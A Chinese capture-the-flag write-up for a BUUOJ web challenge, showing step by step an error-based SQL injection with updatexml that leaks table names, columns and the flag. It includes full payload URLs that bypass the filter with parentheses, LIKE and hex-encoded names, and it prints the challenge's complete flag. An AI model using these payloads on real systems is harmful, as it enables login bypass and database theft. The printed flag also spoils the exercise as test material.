本题使用报错注入：

打开网页：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81

里面随便输入一个用户名密码登录访问地址为：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd
显示：
NO,Wrong username password！！！

追加'or'1：因为后台是SQL查询语句，肯定是'开头，这样第一个'负责闭合SQL，后面的'负责凭借后台结束的'是整个查询语句完整：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd'or'1
显示：
Login Success!!

使用报错注入：追加'or(updatexml(1,concat(0x7e,(select database()),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))or%271
显示：
你可别被我逮住了，臭弟弟

尝试出 被过滤：改为追加'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))or%271
显示中爆出数据库名为geek：
Error!XPATH syntax error: '~geek~'

追加'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1))or%271
显示：
你可别被我逮住了，臭弟弟

尝试出=被过滤：改为追加'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))or%271
显示中爆出表名为H4rDsq1：
Error!XPATH syntax error: '~H4rDsq1~'

接下来如果查询语句直接使用表名H4rDsq1会报错，需要将表名改为16进制
打开notepad++选中H4rDsq1使用插件->Converter->ASCII TO HEX转换为48347244737131

追加'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(0x48347244737131)),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(0x48347244737131)),0x7e),1))or%271
显示中爆出字段为Hid,username,password：
Error!XPATH syntax error: '~id,username,password~'

追加'or(updatexml(1,concat(0x7e,((select(password)from(H4rDsq1))),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,((select(password)from(H4rDsq1))),0x7e),1))or%271
显示出前半段flag（此外传id会显示XPATH syntax error: '~1~'，传username会显示XPATH syntax error: '~flag~'）：
Error!XPATH syntax error: '~flag{cd335ee3-ff15-49d1-9f93-58'

追加'or(updatexml(1,concat(0x7e,((select(password)from(H4rDsq1))),0x7e),1))or'1：
http://56e4af1f-4db3-4bf3-bc54-784d605d157f.node4.buuoj.cn:81/check.php?username=admin&password=asd%27or(updatexml(1,concat(0x7e,(right((select(password)from(H4rDsq1)),32)),0x7e),1))or%271
显示出后半段flag：
Error!XPATH syntax error: '~ee3-ff15-49d1-9f93-584d277f491d'

拼接后得到完整的flag：flag{cd335ee3-ff15-49d1-9f93-584d277f491d}